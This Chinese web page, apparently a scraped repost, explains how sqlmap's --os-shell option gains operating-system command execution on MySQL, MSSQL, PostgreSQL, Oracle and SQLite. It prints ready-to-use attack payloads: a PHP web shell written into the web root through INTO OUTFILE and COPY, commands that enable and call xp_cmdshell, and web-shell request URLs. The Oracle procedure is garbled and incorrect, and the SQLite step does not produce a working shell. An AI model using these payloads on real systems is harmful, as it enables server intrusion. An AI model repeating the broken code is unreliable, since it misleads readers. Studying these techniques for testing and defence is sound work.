当前位置: 首页 > news >正文

sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)

1. MySQL

条件
  • 数据库用户需要具备高权限(如 FILE 权限)。
  • 数据库服务运行用户需要对目标目录有写权限。
  • Web 服务器有可写目录,且支持执行上传的脚本(如 PHP、JSP 等)。
原理
  • 利用 MySQL 的 SELECT ... INTO OUTFILE 功能,将恶意代码写入目标 Web 目录,生成一个 Web Shell 文件。
  • 攻击者通过浏览器访问 Web Shell,获得命令执行能力。
流程
  1. 确认 FILE 权限:
    SELECT * FROM mysql.user WHERE User='target_user';
    

  2. 写入 Web Shell 到目标目录:
    SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
    
  3. 通过浏览器访问 Web Shell 执行命令:
    http://xxxxxx.com/shell.php?cmd=whoami

2. Microsoft SQL Server (MSSQL)

条件
  • 数据库用户需要 sysadmin 权限。
  • 目标服务器启用了扩展存储过程 xp_cmdshell
  • 数据库运行用户有命令执行权限。
原理
  • 调用 MSSQL 的 xp_cmdshell 存储过程,直接在操作系统中执行命令。
流程
  1. 确认是否启用了 xp_cmdshell
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    

  2. 利用 xp_cmdshell 执行命令:
    EXEC xp_cmdshell 'whoami';
    
  3. 通过命令的输出或回显获取执行结果。

3. PostgreSQL

条件
  • 数据库用户需要对文件系统具有写权限。
  • 数据库支持使用 COPY 命令将数据写入文件。
  • 目标 Web 目录可写入文件,并允许脚本执行。
原理
  • 利用 PostgreSQL 的 COPY 功能,将 Web Shell 写入目标文件系统。
流程
  1. 写入 Web Shell:
    COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
  2. 访问 Web Shell:

    http://xxxxx.com/shell.php?cmd=id


4. Oracle

条件
  • 数据库用户需要 CREATE LIBRARY 权限。
  • 数据库运行用户需要访问操作系统。
  • 利用外部过程或 Java 存储过程。
原理
  • 通过 Oracle 数据库的外部过程,调用操作系统命令。
  • 使用 Java 存储过程执行系统级操作。
流程
  1. 创建外部库(如 DLL 文件):
    CREATE OR REPLACE LIBRARY mylib AS '/path/to/external/file';
    
  2. 调用外部过程执行命令:
    DECLAREcmd VARCHAR2(1000);
    BEGINcmd := 'ls';DBMS_SCHEDULER.CREATE_JOB(cmd);
    END;
  3. 读取命令执行结果。

5. SQLite

条件
  • SQLite 本身无法直接与操作系统交互。
  • 必须结合其他漏洞(如本地文件包含)实现 Web Shell。
原理
  • 利用 SQLite 的 ATTACH 或其他功能,尝试将恶意数据写入特定目录。
流程
  1. 写入数据:
    ATTACH DATABASE '/var/www/html/shell.php' AS shell;
  2. 在 Web 服务器中访问生成的 Web Shell 文件。

总结表

数据库条件原理流程简述
MySQLFILE 权限,Web 目录可写写入 Web Shell 通过 SELECT ... INTO OUTFILE写 Shell -> 访问 Shell -> 执行命令
MSSQLsysadmin 权限,启用 xp_cmdshell使用 xp_cmdshell 直接执行系统命令开启 xp_cmdshell -> 执行命令
PostgreSQL写权限,Web 目录可访问使用 COPY 写入 Web Shell写 Shell -> 访问 Shell -> 执行命令
OracleCREATE LIBRARY 权限,系统访问权限使用外部库或 Java 存储过程调用系统命令配置库 -> 调用命令
SQLite结合其他漏洞(如文件包含)写入恶意数据文件,结合其他漏洞(如 LFI)访问写 Shell -> 结合 LFI 执行
http://www.lryc.cn/news/498021.html

相关文章:

  • 2024年认证杯SPSSPRO杯数学建模C题(第一阶段)云中的海盐解题全过程文档及程序
  • 三维扫描检测在汽车制造中的应用
  • 【NoSQL数据库】Hbase基本操作——数据库表的增删改查
  • 【C++】格式化输出详解:掌握 cout 的进阶用法
  • 设计模式学习思路二
  • 什么是等级保护
  • k8s api对象,CRD
  • 【C++指南】C++内存管理 深度解析
  • C++小碗菜之二:软件单元测试
  • PyCharm+Selenium+Pytest配置小记
  • 摩尔线程 国产显卡 MUSA 并行编程 学习笔记-2024/12/04
  • 【FAQ】HarmonyOS SDK 闭源开放能力 —Remote Communication Kit
  • 【日常记录-Mybatis】PageHelper导致语句截断
  • 随时随地掌控数据:如何使用手机APP远程访问飞牛云NAS
  • JVM 类加载器有哪些?双亲委派机制的作用是什么?如何自定义类加载器?
  • 从基态到激发态再到里德伯态的双光子激发过程
  • Clickhouse 外部存储引擎
  • eclipse怎么配置jdk路径?
  • 【前端】JavaScript 中的创建对象模式要点
  • GWAS分析先做后学
  • 【系统设计】高可用之缓存基础
  • 《Java核心技术I》volatile字段
  • 2024运维故障记 | 12/2 网易云音乐崩了
  • 架构设计读后——微服务
  • 软考高级架构-9.4.4-双机热备技术 与 服务器集群技术
  • 聊聊前端工程化
  • “放弃Redis Desktop Manager使用Redis Insight”:日常使用教程(Redis可视化工具)
  • mmdection配置-yolo转coco
  • 聚合支付系统/官方个人免签系统/三方支付系统稳定安全高并发 附教程
  • 力扣67. 二进制求和